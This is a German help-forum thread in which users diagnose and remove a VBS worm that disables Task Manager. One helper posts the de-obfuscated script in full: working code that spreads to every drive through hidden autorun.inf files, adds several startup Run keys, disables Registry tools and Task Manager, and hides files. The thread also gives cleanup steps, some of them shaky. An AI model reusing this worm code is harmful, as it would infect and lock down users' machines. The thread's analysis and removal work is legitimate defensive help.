Windows: "Taskmager wurde vom Adminstrator deaktiviert!"

[MultiPaid4]

Hallöchen.

Dass sie sich wieder herstellen, kann mehrere Gründe haben.
Einer ist zB, dass Du nicht alle augespührt hast uns eine verbleibende sich weiter repliziert. Oder aber es ist ein Registryeintrag vorhanden, der vor dem Neustart nach dem Entfernen gelöscht werden muss.
Oder, es liegt an was ganz anderem.

Vieleicht solltest Du doch mal Deine Daten sichern und dann Deinen Rechner neu aufsetzen, scheint ja ein sehr mühsames Problem zu sein.

 

[LasMiranda]

also das Script fügt die VBS in den Autorun ein und legt auf allen Laufwerken eine autorun.inf an. Dadurch wird sicherlich auch automatisch bei jedem Neustart die Datei wieder hinzugefügt. Die Änderung des IE-Titles wurde ja schon bemerkt.

Allerdings weiß ich grad nicht, was das Dateiattribut 39 bei VBS bedeutet. Wahrscheinlich wird die Datei versteckt.

Die Datei ist eigentlich recht einfach zu lesen, wenn man die ganzen Kommentarzeilen mit ' beginnend rauskickt.

 

[topfklao]

Hätte die Datei auch mal bei AntiVir eingeschickt. Die habs mir aber mit "Clean" zurückgeschickt....
Naja..

---

Die Datei ist eigentlich recht einfach zu lesen, wenn man die ganzen Kommentarzeilen mit ' beginnend rauskickt.

Und was liest man da? Bzw. Ich kann gar nix lesen. Wenn ich die Datei mit dem Editor öffne seh ich nur eine unlogische Reihe von Buchstaben.. Also nix besonderes

Und irgendwie kann es doch echt nicht sein, dass da kein Virenscanner auf dem ganzen PC nix findet.. Da MUSS doch was sein

 

[topfklao]

Noch weitere Lösungsvorschläge?

 

[MultiPaid4]

Du musst alle Zeichen in der Datei die ein ' vorangestellt haben löschen.
Zeilenweise durchgeführt ergibt das:

on error resume next 
dim qw,er,pangpatakbo,laman,asa, tex, size, hala 
set hala = createobject("WScript.Shell") 
set qw = createobject("Scripting.FileSystemObject") 
set er = qw.getfile(Wscript.ScriptFullname) 
size = er.size 
set tex=er.openastextstream(1,-2)
do while not tex.atendofstream 
laman=laman&tex.readline 
laman=laman & vbCrLf 
loop 
pangpatakbo = "[autorun]"&vbCrLf&"shellexecute=wscript.exe 
for each hardisk in qw.drives 
set asa=qw.createtextfile(hardisk.path &"\autorun.inf") 
asa.write pangpatakbo 
asa.close 
set asa = qw.getfile(hardisk.path &"\autorun.inf") 
asa.attributes = 39 
set asa=qw.createtextfile(hardisk.path &"\destrukto.vbs") 
asa.write laman 
asa.close 
set asa = qw.getfile(hardisk.path &"\destrukto.vbs") 
asa.attributes = 39 
next 
hala.regwrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","HI! LOOKING FOR ME? [email protected]" 
hala.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",1,"REG_DWORD" 
hala.regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",1,"REG_DWORD" 
hala.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\qw","C:\WINDOWS\system32\destrukto.vbs"
hala.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\er","C:\WINDOWS\system\destrukto.vbs"
hala.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ty","C:\WINDOWS\Registration\destrukto.vbs"
hala.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\df","C:\WINDOWS\inf\destrukto.vbs"
hala.regwrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\as","C:\WINDOWS\Help\destrukto.vbs"
hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",1,"REG_DWORD"
hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",1,"REG_DWORD"
hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",0,"REG_DWORD"
hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"
set asa=qw.createtextfile("C:\WINDOWS\system32\destrukto.vbs")
asa.write laman asa.close 
set asa = qw.getfile("C:\WINDOWS\system32\destrukto.vbs")
asa.attributes = 39 
set asa=qw.createtextfile("C:\WINDOWS\system\destrukto.vbs")
asa.write laman 
asa.close 
set asa = qw.getfile("C:\WINDOWS\system\destrukto.vbs")
asa.attributes = 39 
set asa=qw.createtextfile("C:\WINDOWS\Registration\destrukto.vbs")
asa.write laman 
asa.close 
set asa = qw.getfile("C:\WINDOWS\Registration\destrukto.vbs")
asa.attributes = 39 
set asa=qw.createtextfile("C:\WINDOWS\Help\destrukto.vbs") 
asa.write laman 
asa.close 
set asa = qw.getfile("C:\WINDOWS\Help\destrukto.vbs")
asa.attributes = 39 
set asa=qw.createtextfile("C:\WINDOWS\inf\destrukto.vbs") 
asa.write laman 
asa.close 
set asa = qw.getfile("C:\WINDOWS\inf\destrukto.vbs") 
asa.attributes = 39

Dort findest Du auch alle Registryeinträge, die verändert wurden.

Schritt 1 Systemwiederherstellung deaktivieren.
Schritt 2 Registryeinträge bearbeiten
Dazu eine textdatei erstellen und folgendes hineinkopieren

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Window Title",""]
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoRun",0,"REG_DWORD"] 
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System\NoDispCPL",0,"REG_DWORD"] 
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0,"REG_DWORD"]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr",0,"REG_DWORD"]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",0,"REG_DWORD"]
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",1,"REG_DWORD"]

Danach die Dateiendung in .reg ändern, Rechtsklick auf diese und auf zusammenführen klicken.
Nun kann per Ausführen => regedit die Registry bearbeitet werden.
Schritt 3 Alle Destrukto Dateien löschen
Schritt 4 autorun.inf Dateien suchen únd alle auswerten, bzw jene mit diesem Problem in Zusammenhang stellen löschen.
Solltenst Du keine Dateien angezeigt werden, dann ist es ratsam im Explorer auf Extras => OrdnerOptionen => Ansicht => Alle Dateien und Ordner anzeigen anhaken und das Häkchen bei geschützte Systemdateien ausblenden entfernen. Dann auf OK klicken und erneut suchen.

Wenn Du mir Deine IP geben könntest und mir auf Deinem Rechner einen Administrator Account anlegen würdest, diesem dann den Remotezugrüff erlauben würdest, könne ich das von hier machen.

lg Andi

PS: Falls ich was übersehen hab, liegts vielleicht an Müdigkeit

 

[topfklao]

Ich hätte die Schritte mal ausgeführt.. Bis jetzt klappt alles!


Danke, dass du mir die Datei leserlich gemacht hast.. Hat mir sehr weiterholfen!

Alle (jetzt warens ja 6) destruktor Dateien wurden 3mal überschrieben und dürften nun hoffentlich weg sein

 

[Yannik]

Wieso so kompliziert? Das ist ein Ausspäh-Programm (kurz Spyware).
Lad dir einfach Spybot: Search & Destroy runter, der müsste das finden.

Hatte ich früher auch öfters.

 

[topfklao]

Hab ich schon längst gemacht.. Eins von den Programmen zeigte mir sogar immer an, wenn die Registry Einträge verändert wurden. Aber das war schon alles. Gefunden hat eigentlich kein Programm etwas.. Vor allem nicht den Eintrag gleich unter "C:/". Da blieb mir die VBS datei immer verborgen..

Mal abgesehen davon, dass man die Dateien eh nie zugesicht bekam. Nur mit Hijackthis erfuhr ich von 5 davon; die ich zwar löschen konnte; aber es dann eh nichts half!

 

[MultiPaid4]

Hy nochmal,

Spybot findet aber nicht alles. Es ist meines Erachtens auch keine Spyware.

Das Du die Dateien nicht angezeigt bekommen hast lag wohl daran, dass sie versteckt waren. Bzw an dem Eintrag

hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\SuperHidden",0,"REG_DWORD" hala.regwrite "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden",0,"REG_DWORD"


Nun hoffen wir mal, dass sich das Problem erledigt hat

lg Andi

 

[topfklao]

Also diese Funktion zum Anzeigen der versteckten Dateien hat ich zwar aktiviert (vgl. deine Beschreibung von oben). Das half aber in diesem Fall nix. Andere versteckt Dateien wurden mir angezeigt. Außer diese!!!

Auf alle Fälle läuft bis jetzt noch alles

 

[topfklao]

na toll.. jetzt ist er wieder da .. Kanns doch ned geben?

Ich war auf null zwilichtigen Websites . Ich hab ned mal Programme gestartet, die ich noch nicht gestartet hab!!!

 

[MultiPaid4]

Das hat ja nicht lang gehalten.
Also es muss nicht immer ganz offensichtlich eine zwielichte Seite sein, meist sind solche Dinge in IFrames eingebunden, hab sowas schon öfter bei Werbebuchungen erlebt.
Da bucht jemand eine Seite, die lauter IFrames beinhaltet wo sich dann ein sogenanter Antivieren Scanner meldet, und behauptet du wärst infiziert.
Wenn man nicht schnell genug die ESC Taste gedrückt hat, hatte man diesen sich was eingefangen und nur Mühevoll wieder runter bekommen.

Vielleicht könnte man die Suche einschränken.
Schau mal wann sich die Datei zum ersten Mal in Deinem System gespeichert hat und dann schaust Du welche Seiten zu dieser Zeit besucht wurden. Musst Dich ein bisschen mit der Suchfunktion von Windows spielen.

Dann machst Du Dein Rechner wieder clean und besuchst dies verdächtigen Seiten. Schreib vielleicht auch mal die Webmaster an, dass sie Ihre Werbeeinblendungen checken sollen. Wichtig ist, die Seiten mit einem Abstand zu durchsuchen, und dazwischen immer vom System abmelden und wieder anmelden, um zu testen woher das wirklich kommt. Nimmt zwar viel Zeit in Anspruch, aber wenn Du den Übeltäter gefunden hast sperrst ihn über Deine Firewall aus. Noch schneller über die hosts im Ordner c:\windows\system32\drivers\etc\

da gibst nur folgendes ein:
127.0.0.1 www.domainname.tld

Also die Domain der Bösen Seite. Speichern und die Seite wird auf Deinen eigenen Rechner umgeleitet.

Wenn Du die Seite gefunden hast schick mir mal den Link per PN, ich will die mir mal anschauen.


lg Andi

 

[topfklao]

Hey Andi!

Mir fiehl grad wieder ein, dass ich gestern noch so nen blöden Link bekommen hab per ICQ, den ne Freundin von mir automatisch verschickt. Die hat wohl ned Virus oben.
Ich hab ihn dann geklickt; AntiVir erkannte ja gleich den Virus, der sich runterladen wollt.
Weiß jetzt aber nicht genau, ob der Spaß dann für das verantwortlich ist bzw ob das vor oder nach der Infektion mit dem "alten Virus" war.
Aber sonst war ich gestern glaub ich nur auf Seiten à la Klamm, Ebay und Google. Nix anderes!!!! Deshalb wunderts mich ja so....

Ich schick dir aber trotzdem mal den Link, den ich per ICQ bekam!

edit: Vermutung: Es könnte sein, dass der Virus auch auf dem Handywechseldatenträger war... Denn den glaub ich hab ich gestern angeschlossen gehabt und aufgerufen...

 

[topfklao]

Ich hab die Quelle gefunden!
Es war tatsächlich auf dem Handy oben.. Wahnsinn!!!!!

Ich hoff ich habs nicht noch auf nem USB Stick oben!

 

[MultiPaid4]

Ja wenn Du den Stick zu seiner Zeit drin hattest ists sehr gut möglich.
Hoffentlich hast nicht noch andere infiziert

Aber ansonsten hoffe ich für Dich, dass nun endlich Ruhe eingekehrt ist.
Möglicherweise könnten sich aber auch noch Dateien auf gebrannten Medien befinden. Also Vorsicht.

Über ICQ würd ich nie Links anklicken, die automatisch verschickt werden, dort werden Accounts verwendet um soetwas zu verbreiten. Dumm wärs nur, wenn man Dinge bekommt, die noch kein Antivierenprogramm findet.

Den Link zu klicken ist eigentlich nicht schlimm, schlimm ists erst, wenn man so clever ist die Datei zu speichern.


lg Andi

 

[topfklao]

Gespeichert hab ich die Dateien sowieso nicht..

Und USB Sticks hab ich normalerweise nicht drin. Werd aber bei allen mal schaun und die Leute dementsprechend informieren..

Bin dann mal gespannt, ob AntiVir reagiert. Geschickt hät ich ihnen nämlich die Dateien mal!

 

[MultiPaid4]

Naja selbst wenn sie es mit einbeziehen würden, würde wenig später sowieso wieder sowas auf dem markt sein. Ich glaub auch nicht wirklich, dass dies ein schwerwiegendes Problem ist, denn Großen Schaden richtet es ja nicht an, es vervielfältigt sich nur immer wieder in die gleichen Verzeichnisse, also überschreibt sich selbst. Weder wird die Datei an sich größer noch stellt es größere Sicherheitsrisiken dar. Meine ich zumindest.

Das Dumme ist aber, dass man da nicht viel machen kann, außer noch aufmerksamer sein bei dem was man klickt und herunterläd.

Das eigentliche Problem des Ganzen ist nämlich, das vb Scripts immer administrativen Zugriff haben (Zugriff wie ein Domain-Admin oder Localer Admin des Systems) das Script könnte löschen, kopieren, blockieren, freigeben und und und.

Deswegen hab ich zuvor schon einmal geschrieben, dass es sicherer ist, sich nicht mit einem Administratorkonto die täglichen Surfsessions zu geben sondern mit einem Benutzerkonto, auf Orte an denen sich das Script kopiert hat, hat dieser keinen Zugriff, somit holst Du Dir nämlich die schädliche Datei garnicht erst auf den Rechner. Ist zwar auch keine 100%ige Garantie aber auf jeden Fall sicherer.

lg Andi